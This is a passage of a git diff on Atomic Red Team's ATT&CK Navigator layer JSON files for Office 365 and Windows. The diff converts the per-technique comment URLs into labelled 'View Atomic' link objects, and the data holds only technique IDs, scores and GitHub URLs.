Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1222.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1222","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1543.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1543","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.014","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1547.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"}]},{"techniqueID":"T1548.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1548","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1553.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1555.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1569.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json index 6d914ff8..964bc447 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json 
@@ -1 +1 @@ -{"version":"4.3","name":"Atomic Red Team (Office-365)","description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]} \ No newline at end of file +{"version":"4.3","name":"Atomic Red Team (Office-365)","description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index b7eb3cf9..0a8439f4 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json 
@@ -1 +1 @@ -{"version":"4.3","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T100
3/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"en
abled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1040","score":100,"enabled":true,"commen
t":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1041","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-r
ed-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/ato
mic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryc
o/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redca
naryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-r
ed-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1091","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-